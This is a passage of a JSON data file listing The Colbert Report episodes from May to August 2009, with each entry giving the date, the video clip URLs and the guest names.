        "http://thecolbertreport.cc.com/videos/1yb1cp/intro---05-05-09",
        "http://thecolbertreport.cc.com/videos/daeu0o/cinco-de-mayo-precautions",
        "http://thecolbertreport.cc.com/videos/73g8ui/the-word---captain-kangaroo-court",
        "http://thecolbertreport.cc.com/videos/sye42t/paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/xul98m/sign-off---iteam",
        "http://thecolbertreport.cc.com/videos/0a05it/movies-that-are-destroying-america---summer-movie-edition"
      ],
      "guest": "Cliff Sloan, Paul Rieckhoff"
    },
    {
      "date": "2009-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4aqttz/intro---05-06-09",
        "http://thecolbertreport.cc.com/videos/k97z53/colbert-branson-duel",
        "http://thecolbertreport.cc.com/videos/4h8qcx/where-and-when-is-stephen-going-to-the-persian-gulf----saudi-arabia",
        "http://thecolbertreport.cc.com/videos/q7lfqg/laurie-garrett",
        "http://thecolbertreport.cc.com/videos/2y8ihh/hug-your-television",
        "http://thecolbertreport.cc.com/videos/mekuw6/picking-a-new-supreme-court-justice---cliff-sloan"
      ],
      "guest": "Laurie Garrett"
    },
    {
      "date": "2009-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nqr22g/intro---05-07-09",
        "http://thecolbertreport.cc.com/videos/40ivqy/sean-hannity-s-liberty-tree",
        "http://thecolbertreport.cc.com/videos/ednx54/smokin--pole---the-fight-for-arctic-riches--inuit-nation",
        "http://thecolbertreport.cc.com/videos/as8qiu/mitchell-joachim",
        "http://thecolbertreport.cc.com/videos/4bas9p/spay-and-neuter-your-pets",
        "http://thecolbertreport.cc.com/videos/686y3f/tip-wag---forced-smoking---grizzly-best-man"
      ],
      "guest": "Mitchell Joachim"
    },
    {
      "date": "2009-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/imn21t/intro---05-11-09",
        "http://thecolbertreport.cc.com/videos/cctfpl/stephen-s-fancy-feast",
        "http://thecolbertreport.cc.com/videos/bwc8x1/credit-card-industry-regulation---tamara-draut",
        "http://thecolbertreport.cc.com/videos/cguksk/alpha-dog-of-the-week---erik-slye",
        "http://thecolbertreport.cc.com/videos/3ttm11/jeff-daniels"
      ],
      "guest": "Tamara Draut"
    },
    {
      "date": "2009-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wr98c1/intro---05-12-09",
        "http://thecolbertreport.cc.com/videos/zy5zj6/howard-s-end",
        "http://thecolbertreport.cc.com/videos/n89zl7/cuba-us-trade-relations---julia-sweig",
        "http://thecolbertreport.cc.com/videos/hs7gtm/stephen-s-sound-advice---how-to-re-brand-the-gop",
        "http://thecolbertreport.cc.com/videos/a0bgn9/ron-howard",
        "http://thecolbertreport.cc.com/videos/6fx090/credit-check",
        "http://thecolbertreport.cc.com/videos/lzvish/sign-off---unicorn-dealership"
      ],
      "guest": "Ron Howard"
    },
    {
      "date": "2009-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yvcq61/intro---05-13-09",
        "http://thecolbertreport.cc.com/videos/g3716f/robert-gibbs-hates-ringing-cell-phones",
        "http://thecolbertreport.cc.com/videos/hp9jyy/colbert-platinum----1-000-dishes",
        "http://thecolbertreport.cc.com/videos/eon7i2/michael-pollan",
        "http://thecolbertreport.cc.com/videos/0it13s/stephen-colbert-is-awesome",
        "http://thecolbertreport.cc.com/videos/5715dt/our-plan-in-havana",
        "http://thecolbertreport.cc.com/videos/g7s21x/you-are-a-dummy"
      ],
      "guest": "Michael Pollan"
    },
    {
      "date": "2009-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ph1m2t/intro---05-14-09",
        "http://thecolbertreport.cc.com/videos/priitm/caveman-porn-stash",
        "http://thecolbertreport.cc.com/videos/phfour/donorschoose-org-donations",
        "http://thecolbertreport.cc.com/videos/m82ydm/yusuf",
        "http://thecolbertreport.cc.com/videos/vyychn/stephen-s-coke-party-protest"
      ],
      "guest": "Yusuf"
    },
    {
      "date": "2009-05-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hopfi8/intro---05-18-09",
        "http://thecolbertreport.cc.com/videos/gc17yz/welcome-to-the-real-world--obama",
        "http://thecolbertreport.cc.com/videos/oh4xki/threatdown---charity--casual-jesus---robot-teachers",
        "http://thecolbertreport.cc.com/videos/phv8h6/meghan-mccain",
        "http://thecolbertreport.cc.com/videos/h4dfgj/sign-off---internal-clock"
      ],
      "guest": "Meghan McCain"
    },
    {
      "date": "2009-05-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k69zx1/intro---05-19-09",
        "http://thecolbertreport.cc.com/videos/um8x6x/rumsfeld-s-cover-letter-bible-quotes",
        "http://thecolbertreport.cc.com/videos/9w54d6/difference-makers---stephen-keith",
        "http://thecolbertreport.cc.com/videos/tn9xuo/walter-kirn",
        "http://thecolbertreport.cc.com/videos/l2dw5z/stephen-s-show",
        "http://thecolbertreport.cc.com/videos/y5v5ns/the-word---tough-cell"
      ],
      "guest": "Walter Kirn"
    },
    {
      "date": "2009-05-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zq89uw/intro---05-20-09",
        "http://thecolbertreport.cc.com/videos/b9eth2/extra--extra--bleed-all-about-it-",
        "http://thecolbertreport.cc.com/videos/e5f1sd/donorschoose-org-classroom-projects",
        "http://thecolbertreport.cc.com/videos/u2rpts/seth-shostak",
        "http://thecolbertreport.cc.com/videos/m63aac/goodnight",
        "http://thecolbertreport.cc.com/videos/i401ml/the-word---i-know-you-are-but-what-am-i-"
      ],
      "guest": "Seth Shostak"
    },
    {
      "date": "2009-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sll291/intro---05-21-09",
        "http://thecolbertreport.cc.com/videos/hck7te/47-million-year-old-fossil",
        "http://thecolbertreport.cc.com/videos/4kzrbn/formidable-opponent---pragmatism-or-idealism",
        "http://thecolbertreport.cc.com/videos/ait1y2/green-day",
        "http://thecolbertreport.cc.com/videos/iuaf6k/she-said--cia-said---bob-graham"
      ],
      "guest": "Green Day"
    },
    {
      "date": "2009-06-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kbuqbk/intro---06-01-09",
        "http://thecolbertreport.cc.com/videos/ckumab/guns-in-national-parks",
        "http://thecolbertreport.cc.com/videos/ezeifx/sonia-sotomayor-s-nomination---jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/2p70rc/where-and-when-is-stephen-going-to-the-persian-gulf----united-arab-emirates",
        "http://thecolbertreport.cc.com/videos/4suoo4/byron-dorgan"
      ],
      "guest": "Jeffrey Toobin, Sen. Byron Dorgan"
    },
    {
      "date": "2009-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/poyt56/intro---06-02-09",
        "http://thecolbertreport.cc.com/videos/xahwo7/saudi-arabia-press-restrictions",
        "http://thecolbertreport.cc.com/videos/m4ur7f/jim-moran-vs--viagra",
        "http://thecolbertreport.cc.com/videos/bpwglm/katty-kay",
        "http://thecolbertreport.cc.com/videos/860dm5/best-audience-of-the-night",
        "http://thecolbertreport.cc.com/videos/ch9xnn/supreme-court-press",
        "http://thecolbertreport.cc.com/videos/t28i3d/dance-for-stephen"
      ],
      "guest": "Katty Kay"
    },
    {
      "date": "2009-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lte593/intro---06-03-09",
        "http://thecolbertreport.cc.com/videos/1azzsn/we-have-a-death-star-",
        "http://thecolbertreport.cc.com/videos/in49m6/tip-wag---4th-of-july--craig-t--nelson---gm",
        "http://thecolbertreport.cc.com/videos/ughago/eric-schlosser",
        "http://thecolbertreport.cc.com/videos/fw7nrm/sign-off----the-hollow-men-",
        "http://thecolbertreport.cc.com/videos/rfeepg/cheating-death---cheerios--soda-paralysis---oprah-s-crazy-talk"
      ],
      "guest": "Eric Schlosser"
    },
    {
      "date": "2009-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpkl6b/intro---06-04-09",
        "http://thecolbertreport.cc.com/videos/oqx005/wikipedia-bans-scientologists",
        "http://thecolbertreport.cc.com/videos/anuhnx/craziest-f--king-thing-i-ve-ever-heard---external-lungs",
        "http://thecolbertreport.cc.com/videos/obi6e0/dag-soderberg",
        "http://thecolbertreport.cc.com/videos/u226dl/the-word---i-do--you-don-t"
      ],
      "guest": "Dag Soderberg, David Byrne"
    },
    {
      "date": "2009-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gbu94e/operation-iraqi-stephen---mysterious-trip",
        "http://thecolbertreport.cc.com/videos/wy7a2l/operation-iraqi-stephen---john-mccain",
        "http://thecolbertreport.cc.com/videos/n4g2vg/stephen-strong---army-of-me---basic-training-pt--1",
        "http://thecolbertreport.cc.com/videos/c4z5y3/obama-orders-stephen-s-haircut---ray-odierno",
        "http://thecolbertreport.cc.com/videos/m6uaot/sign-off---new-haircut"
      ],
      "guest": "Stephen broadcasts from Iraq, Gen. Ray Odierno"
    },
    {
      "date": "2009-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xuowp6/operation-iraqi-stephen---s-h-",
        "http://thecolbertreport.cc.com/videos/nlvzz2/operation-iraqi-stephen---bill-clinton---amp-energy",
        "http://thecolbertreport.cc.com/videos/8querl/formidable-opponent---don-t-ask--don-t-tell",
        "http://thecolbertreport.cc.com/videos/xjmvnq/tareq-salha---robin-balcom",
        "http://thecolbertreport.cc.com/videos/bdo17v/sign-off---hi--stephen-s-mom",
        "http://thecolbertreport.cc.com/videos/clgan9/the-word---why-are-you-here-"
      ],
      "guest": "Stephen broadcasts from Iraq (1)"
    },
    {
      "date": "2009-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3avxyi/operation-iraqi-stephen---stephen-s-spider-hole",
        "http://thecolbertreport.cc.com/videos/cyrxgp/admiral-crunch",
        "http://thecolbertreport.cc.com/videos/xfobul/lt--gen--charles-h--jacoby-jr-",
        "http://thecolbertreport.cc.com/videos/jk0yi6/sign-off---head-rub",
        "http://thecolbertreport.cc.com/videos/nlng6v/operation-iraqi-stephen---tom-hanks-care-package",
        "http://thecolbertreport.cc.com/videos/xbtx2g/stephen-strong---army-of-me---basic-training-pt--2"
      ],
      "guest": "Stephen broadcasts from Iraq (2)"
    },
    {
      "date": "2009-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x1yyko/stephen-gets-his-hair-cut",
        "http://thecolbertreport.cc.com/videos/ithwrz/operation-iraqi-stephen---golf-club---george-w--bush-s-greeting",
        "http://thecolbertreport.cc.com/videos/9p7eto/operation-iraqi-stephen---fallback-position---air-force-thunderbirds",
        "http://thecolbertreport.cc.com/videos/hqcfyh/operation-iraqi-stephen---frank-a--grippe",
        "http://thecolbertreport.cc.com/videos/aa7w7z/operation-iraqi-stephen---sign-off---honey--i-m-coming-home",
        "http://thecolbertreport.cc.com/videos/74tfzb/better-know-a-cradle-of-civilization---barham-saleh"
      ],
      "guest": "Stephen broadcasts from Iraq (3)"
    },
    {
      "date": "2009-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7zoy4v/intro---06-15-09",
        "http://thecolbertreport.cc.com/videos/ycfoc7/warm-memories-of-iraq",
        "http://thecolbertreport.cc.com/videos/cgcvlh/car-shout---gm---chrysler",
        "http://thecolbertreport.cc.com/videos/px4jql/austan-goolsbee",
        "http://thecolbertreport.cc.com/videos/22hank/sign-off---driving-for-the-last-10-minutes"
      ],
      "guest": "Austan Goolsbee"
    },
    {
      "date": "2009-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6kwzzi/intro---06-16-09",
        "http://thecolbertreport.cc.com/videos/e51xox/croatia-s-biggest-jeans-world-record",
        "http://thecolbertreport.cc.com/videos/86p43v/teh-runoff---karim-sadjadpour",
        "http://thecolbertreport.cc.com/videos/guirtz/balls-for-kidz---carnivals-encore",
        "http://thecolbertreport.cc.com/videos/8g3agb/jim-rogers",
        "http://thecolbertreport.cc.com/videos/1bur1p/stephen-s-sound-advice---how-to-be-a-totalitarian-nutjob"
      ],
      "guest": "Karim Sadjadpour, Jim Rogers"
    },
    {
      "date": "2009-06-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vz7xis/intro---06-17-09",
        "http://thecolbertreport.cc.com/videos/y8n8bj/stephen-s-positive-obama-coverage",
        "http://thecolbertreport.cc.com/videos/v8qfms/the-word---bohemian-grove",
        "http://thecolbertreport.cc.com/videos/fgc5qj/alpha-dog-of-the-week---silvio-berlusconi",
        "http://thecolbertreport.cc.com/videos/6wqhd0/joshua-micah-marshall",
        "http://thecolbertreport.cc.com/videos/1jvq35/teh-runoff",
        "http://thecolbertreport.cc.com/videos/31otgs/goodnight"
      ],
      "guest": "Joshua Micah Marshall"
    },
    {
      "date": "2009-06-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ewcaj5/intro---06-18-09",
        "http://thecolbertreport.cc.com/videos/0qwej8/murder-in-the-white-house---jeff-goldblum",
        "http://thecolbertreport.cc.com/videos/nmpsnk/bears---balls---tobacco--project-natal---graveyard-bids",
        "http://thecolbertreport.cc.com/videos/e8rev9/paul-muldoon",
        "http://thecolbertreport.cc.com/videos/dvld1q/sign-off---law---order-preview",
        "http://thecolbertreport.cc.com/videos/e8h8e5/murder-in-the-white-house---fly-widow-interview",
        "http://thecolbertreport.cc.com/videos/e72lp2/sign-off---aloha--idaho"
      ],
      "guest": "Paul Muldoon"
    },
    {
      "date": "2009-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/je4uya/intro---06-22-09",
        "http://thecolbertreport.cc.com/videos/91fk6r/zicam-recall",
        "http://thecolbertreport.cc.com/videos/h9527k/the-enemy-within---cane-fu",
        "http://thecolbertreport.cc.com/videos/he9dc0/simon-schama",
        "http://thecolbertreport.cc.com/videos/k4vrsb/sign-off---stephen-suffers--too"
      ],
      "guest": "Simon Schama"
    },
    {
      "date": "2009-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wovkbp/barack-obama-s-response-to-iran",
        "http://thecolbertreport.cc.com/videos/yaknra/america-s-health-plan-demic",
        "http://thecolbertreport.cc.com/videos/xc1sqp/governor-alert---the-search-for-mark-sanford",
        "http://thecolbertreport.cc.com/videos/fmv6yq/david-kilcullen",
        "http://thecolbertreport.cc.com/videos/i99yp3/the-smell-of-freedom---jeff-goldblum"
      ],
      "guest": "Howard Dean, David Kilcullen"
    },
    {
      "date": "2009-06-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rhiizu/intro---06-24-09",
        "http://thecolbertreport.cc.com/videos/5xejpe/mark-sanford-does-something-interesting",
        "http://thecolbertreport.cc.com/videos/neths8/matthew-crawford",
        "http://thecolbertreport.cc.com/videos/i50dum/sign-off---random-gps-coordinate-lottery",
        "http://thecolbertreport.cc.com/videos/jkobj5/america-s-health-plan-demic---howard-dean",
        "http://thecolbertreport.cc.com/videos/411cqv/sign-off---goodnight"
      ],
      "guest": "Matthew Crawford"
    },
    {
      "date": "2009-06-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j1tx3a/intro---06-25-09",
        "http://thecolbertreport.cc.com/videos/g71yl5/gay-demon-on-the-loose",
        "http://thecolbertreport.cc.com/videos/5gki1y/commonsense-health-care-reform-infomercial",
        "http://thecolbertreport.cc.com/videos/ohjhjq/jim-fouratt",
        "http://thecolbertreport.cc.com/videos/l3h2eg/sign-off---one-breath",
        "http://thecolbertreport.cc.com/videos/nw0bxn/sport-report---soccer--tennis---brett-favre"
      ],
      "guest": "Jim Fouratt"
    },
    {
      "date": "2009-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ehxpq9/jeff-goldblum-will-be-missed",
        "http://thecolbertreport.cc.com/videos/di8fs8/michael-jackson-s-media-attention",
        "http://thecolbertreport.cc.com/videos/8ouc6a/the-word---noncensus",
        "http://thecolbertreport.cc.com/videos/4zr9io/neil-degrasse-tyson"
      ],
      "guest": "Neil DeGrasse Tyson"
    },
    {
      "date": "2009-06-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/klvpw6/intro---06-30-09",
        "http://thecolbertreport.cc.com/videos/hy9hl7/al-franken-finally-declared-senator",
        "http://thecolbertreport.cc.com/videos/hzd5cg/4th-of-july-under-attack",
        "http://thecolbertreport.cc.com/videos/jzev8y/is-it-time-to-care-about-soccer-",
        "http://thecolbertreport.cc.com/videos/knfvfz/is-it-time-to-care-about-soccer----alexi-lalas",
        "http://thecolbertreport.cc.com/videos/8x5ezx/kevin-mattson",
        "http://thecolbertreport.cc.com/videos/ehxpq9/jeff-goldblum-will-be-missed"
      ],
      "guest": "Alexi Lalas, Kevin Mattson"
    },
    {
      "date": "2009-07-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/umpd2x/intro---07-01-09",
        "http://thecolbertreport.cc.com/videos/opbzv4/the-second-coming-of-ronald-reagan",
        "http://thecolbertreport.cc.com/videos/6wo5t4/the-clinton-curse",
        "http://thecolbertreport.cc.com/videos/heqh3g/judge--jury---executioner---firefighters--gold-waste---strip-search",
        "http://thecolbertreport.cc.com/videos/r9zau8/nicholas-kristof",
        "http://thecolbertreport.cc.com/videos/sldptb/sign-off---farewell--david-souter"
      ],
      "guest": "Nicholas Kristof"
    },
    {
      "date": "2009-07-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f4016f/intro---07-02-09",
        "http://thecolbertreport.cc.com/videos/mc9la4/cnn-finds-bubbles-the-chimp",
        "http://thecolbertreport.cc.com/videos/n31uuy/re-report---lost-treasures-of-babylon",
        "http://thecolbertreport.cc.com/videos/v5trw8/ed-viesturs",
        "http://thecolbertreport.cc.com/videos/zc3q4z/sign-off---see-you-at-the-bar",
        "http://thecolbertreport.cc.com/videos/sedae1/tip-wag---cynthia-davis---fox-news",
        "http://thecolbertreport.cc.com/videos/wyj1b1/sign-off---get-your-illegal-fireworks"
      ],
      "guest": "Ed Viesturs"
    },
    {
      "date": "2009-07-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4zm73s/intro---07-13-09",
        "http://thecolbertreport.cc.com/videos/m8x1rr/va-backlog---paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/qvijip/paul-krugman",
        "http://thecolbertreport.cc.com/videos/2wjc98/goodnight"
      ],
      "guest": "Paul Rieckhoff, Paul Krugman"
    },
    {
      "date": "2009-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w7y41r/intro---07-14-09",
        "http://thecolbertreport.cc.com/videos/17wwbv/raise-high-the-rage-beams",
        "http://thecolbertreport.cc.com/videos/o7y2te/leymah-gbowee",
        "http://thecolbertreport.cc.com/videos/9nhp7n/sign-off---the-pitcher-in-the-oat",
        "http://thecolbertreport.cc.com/videos/55a0ws/remembering-remembering-michael-jackson",
        "http://thecolbertreport.cc.com/videos/bfjyjy/stephen-s-sound-advice---how-to-bork-a-nominee"
      ],
      "guest": "Leymah Gbowee"
    },
    {
      "date": "2009-07-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/38zw9a/intro---07-15-09",
        "http://thecolbertreport.cc.com/videos/7avxb3/stephen-wants-to-be-the-worst-person-in-the-world",
        "http://thecolbertreport.cc.com/videos/yhsbjx/difference-makers---doug-jackson",
        "http://thecolbertreport.cc.com/videos/jkayfy/douglas-rushkoff",
        "http://thecolbertreport.cc.com/videos/1ikoxj/sign-off---no-man-is-a-failure",
        "http://thecolbertreport.cc.com/videos/9vyt62/senator-wences-questions-sonia-sotomayor",
        "http://thecolbertreport.cc.com/videos/jb4xw4/the-word---guns--credit--and-corn"
      ],
      "guest": "Douglas Rushkoff"
    },
    {
      "date": "2009-07-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n291gl/intro---07-16-09",
        "http://thecolbertreport.cc.com/videos/7pmbq4/the-memy-awards",
        "http://thecolbertreport.cc.com/videos/3ahlmo/cheating-death---diabetes-dogs--chocolate-milk---swearing-in-pain",
        "http://thecolbertreport.cc.com/videos/7hp904/edmund-andrews",
        "http://thecolbertreport.cc.com/videos/1wc2dn/sign-off---stephen-wins",
        "http://thecolbertreport.cc.com/videos/cqz0pq/tip-wag---assassination-squads--biblical-history---gay-penguins"
      ],
      "guest": "Edmund Andrews"
    },
    {
      "date": "2009-07-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z5a6bx/walter-cronkite-remembered",
        "http://thecolbertreport.cc.com/videos/0a6zq6/reverse-racism",
        "http://thecolbertreport.cc.com/videos/wqv2b7/sport-report---jessica-simpson--olympic-brothel---bud-light",
        "http://thecolbertreport.cc.com/videos/bowvin/bob-park",
        "http://thecolbertreport.cc.com/videos/x2ppm1/sign-off---goodnight"
      ],
      "guest": "Geoffrey Canada, Bob Park"
    },
    {
      "date": "2009-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/78h601/intro---07-21-09",
        "http://thecolbertreport.cc.com/videos/1egi6s/40th-anniversary-of-the-moon-landing",
        "http://thecolbertreport.cc.com/videos/puckfx/better-know-a-lobby---acorn",
        "http://thecolbertreport.cc.com/videos/gwtxoo/aaron-carroll",
        "http://thecolbertreport.cc.com/videos/o84f1o/sign-off---stephen-s-chip",
        "http://thecolbertreport.cc.com/videos/hmh0yy/reverse-racism---geoffrey-canada"
      ],
      "guest": "Dr. Aaron Carroll"
    },
    {
      "date": "2009-07-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j9y28p/intro---07-22-09",
        "http://thecolbertreport.cc.com/videos/43yfk6/the-longest-solar-eclipse-of-the-century",
        "http://thecolbertreport.cc.com/videos/8st941/sniper-trifle---matthew-waxman",
        "http://thecolbertreport.cc.com/videos/gda2z2/pope-wrist-watch",
        "http://thecolbertreport.cc.com/videos/hlljrv/chris-anderson",
        "http://thecolbertreport.cc.com/videos/tzs7et/the-word---a-perfect-world"
      ],
      "guest": "Matthew Waxman, Chris Anderson"
    },
    {
      "date": "2009-07-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/abmeny/health-care-reform-is-the-matrix",
        "http://thecolbertreport.cc.com/videos/al2ar6/health-care-hell-scare---die-agnosis--mur-dr",
        "http://thecolbertreport.cc.com/videos/lb7ei8/sign-off---tivo",
        "http://thecolbertreport.cc.com/videos/l3lw8t/sniper-trifle",
        "http://thecolbertreport.cc.com/videos/1y6s8z/sign-off---goodnight"
      ],
      "guest": "Zev Chafets"
    },
    {
      "date": "2009-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g64g5i/intro---07-27-09",
        "http://thecolbertreport.cc.com/videos/bx3wyo/sarah-palin-will-be-missed",
        "http://thecolbertreport.cc.com/videos/5mjokj/nailed--em---library-crime",
        "http://thecolbertreport.cc.com/videos/c4hocz/movits-"
      ],
      "guest": "Movits"
    },
    {
      "date": "2009-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nwsa83/president-obama-s-teachable-moment",
        "http://thecolbertreport.cc.com/videos/574gc1/womb-raiders---the-fight-for-the-truth-behind-obama-s-birth",
        "http://thecolbertreport.cc.com/videos/wg36jw/arianna-huffington",
        "http://thecolbertreport.cc.com/videos/aayh4c/sign-off---devil-s-tricks",
        "http://thecolbertreport.cc.com/videos/g64g5i/intro---07-27-09"
      ],
      "guest": "Arianna Huffington"
    },
    {
      "date": "2009-07-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n0hvmj/intro---07-29-09",
        "http://thecolbertreport.cc.com/videos/em0er2/frank-the-roommate",
        "http://thecolbertreport.cc.com/videos/hw67wd/sport-report---tour-de-france---robotic-baseball",
        "http://thecolbertreport.cc.com/videos/2dvjk4/kevin-baker",
        "http://thecolbertreport.cc.com/videos/h00qyf/sign-off---watch-without-blinking",
        "http://thecolbertreport.cc.com/videos/zafhtu/womb-raiders---orly-taitz"
      ],
      "guest": "Kevin Baker"
    },
    {
      "date": "2009-07-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jdw6pa/intro---07-30-09",
        "http://thecolbertreport.cc.com/videos/uq6k19/white-house-beer-summit",
        "http://thecolbertreport.cc.com/videos/fmie7p/tip-wag---man-words---movits-",
        "http://thecolbertreport.cc.com/videos/g75n20/kathryn-bigelow",
        "http://thecolbertreport.cc.com/videos/2mqpw1/sign-off---taco-bell-spokesdog",
        "http://thecolbertreport.cc.com/videos/10c870/the-word---he-who-smelt-it--dealt-it"
      ],
      "guest": "Kathryn Bigelow"
    },
    {
      "date": "2009-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6tkw9s/intro---08-03-09",
        "http://thecolbertreport.cc.com/videos/g2s68c/dominic-philip-s-book-habit",
        "http://thecolbertreport.cc.com/videos/kc14p7/nailed--em---war-on-birth-control",
        "http://thecolbertreport.cc.com/videos/yre45i/tony-zinni",
        "http://thecolbertreport.cc.com/videos/vv0gs6/sign-off---goodnight"
      ],
      "guest": "Gen. Tony Zinni"
    },
    {
      "date": "2009-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2qha08/merry-barackmas",
        "http://thecolbertreport.cc.com/videos/wyon84/the-word---hippie-replacement",
        "http://thecolbertreport.cc.com/videos/m1d4yt/kurt-andersen",
        "http://thecolbertreport.cc.com/videos/e8glog/sign-off---love-makes-the-world-go-round",
        "http://thecolbertreport.cc.com/videos/lqp674/bears---balls---how-to-pay-for-health-care"
      ],
      "guest": "Kurt Andersen"
    },
    {
      "date": "2009-08-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dozbxd/bill-clinton-s-personal-appearance",
        "http://thecolbertreport.cc.com/videos/pedumk/2010-midterms---joe-sestak",
        "http://thecolbertreport.cc.com/videos/8s2cpt/kris-kobach",
        "http://thecolbertreport.cc.com/videos/5f7tro/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/7wxgsg/colbert-bump-cocktail---david-wondrich"
      ],
      "guest": "Kris Kobach"
    },
    {
      "date": "2009-08-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vesroc/intro---08-06-09",
        "http://thecolbertreport.cc.com/videos/7qrkub/back-to-school-with-jeremih",
        "http://thecolbertreport.cc.com/videos/04qijm/movies-that-are-destroying-america---summer",
        "http://thecolbertreport.cc.com/videos/zar0yt/meryl-streep",
        "http://thecolbertreport.cc.com/videos/diktol/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/updeyd/human-week"
      ],
      "guest": "Meryl Streep"
    },
    {
      "date": "2009-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gaywhl/intro---08-10-09",
        "http://thecolbertreport.cc.com/videos/0aiuqk/death-panels",
        "http://thecolbertreport.cc.com/videos/1d8uxl/better-know-a-district---maine-s-1st---chellie-pingree",
        "http://thecolbertreport.cc.com/videos/klodac/barbara-boxer",
        "http://thecolbertreport.cc.com/videos/9r0u01/sign-off---encore"
      ],
      "guest": "Sen. Barbara Boxer"
    },
    {
      "date": "2009-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1qhrzu/intro---08-11-09",
        "http://thecolbertreport.cc.com/videos/tq0ixs/stephen-s-driving-tips-via-twitter-service",
        "http://thecolbertreport.cc.com/videos/kc7xgf/alpha-dog-of-the-week---betty-lichtenstein",
        "http://thecolbertreport.cc.com/videos/0ivmu5/jonathan-cohn",
        "http://thecolbertreport.cc.com/videos/9pu9xl/sign-off---prevent-forest-fires",
        "http://thecolbertreport.cc.com/videos/dra60l/cold-war-update---cuba---topless-putin"
      ],
      "guest": "Jonathan Cohn"
    },
    {
      "date": "2009-08-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9g2evg/intro---08-12-09",
        "http://thecolbertreport.cc.com/videos/cypmfk/americans-sacrifice-their-ipods",
        "http://thecolbertreport.cc.com/videos/5esjcx/formidable-opponent---health-care---burger-king",
        "http://thecolbertreport.cc.com/videos/53n2qf/mark-johnson",
        "http://thecolbertreport.cc.com/videos/j153gh/yes-we-afghan---james-carville"
      ],
      "guest": "Mark Johnson"
    },
    {
      "date": "2009-08-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3rk7mk/intro---08-13-09",
        "http://thecolbertreport.cc.com/videos/d9wypw/sheila-jackson-lee-takes-a-phone-call",
        "http://thecolbertreport.cc.com/videos/1fblyv/cheating-death---blue-m-ms--vitamin-d---hormones",
        "http://thecolbertreport.cc.com/videos/pfw8xc/mark-devlin",
        "http://thecolbertreport.cc.com/videos/xagarl/sign-off---stephen-s-online-information",
        "http://thecolbertreport.cc.com/videos/8bsp4q/who-s-not-honoring-me-now----obama--nra---teen-choice-awards"
      ],
      "guest": "Mark Devlin"
    },
    {
      "date": "2009-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eu8yuk/intro---08-17-09",
        "http://thecolbertreport.cc.com/videos/54nh4d/obama-publishes-health-care-op-ed",
        "http://thecolbertreport.cc.com/videos/xe1vuk/even-better-er-know-a-district---colorado-s-2nd---jared-polis",
        "http://thecolbertreport.cc.com/videos/p4m942/bill-mckibben",
        "http://thecolbertreport.cc.com/videos/rasuqa/sign-off---goodnight"
      ],
      "guest": "Bill McKibben"
    },
    {
      "date": "2009-08-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wagj66/intro---08-18-09",
        "http://thecolbertreport.cc.com/videos/wu0pjh/hamid-karzai-endorsement",
        "http://thecolbertreport.cc.com/videos/z3d9c9/tip-wag---german-campaign--russian-dogs---flying-rabbis",
        "http://thecolbertreport.cc.com/videos/xjhfzn/robert-wright",
        "http://thecolbertreport.cc.com/videos/nw5bk3/sign-off--shofar",
        "http://thecolbertreport.cc.com/videos/79rlpw/the-word---must-be-tv"
      ],
      "guest": "Robert Wright"
    },
    {
      "date": "2009-08-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eu5hos/barney-frank-refuses-to-talk-to-a-dining-room-table",
        "http://thecolbertreport.cc.com/videos/f6lol5/sugar-shortage---marion-nestle",
        "http://thecolbertreport.cc.com/videos/ckefur/ang-lee",
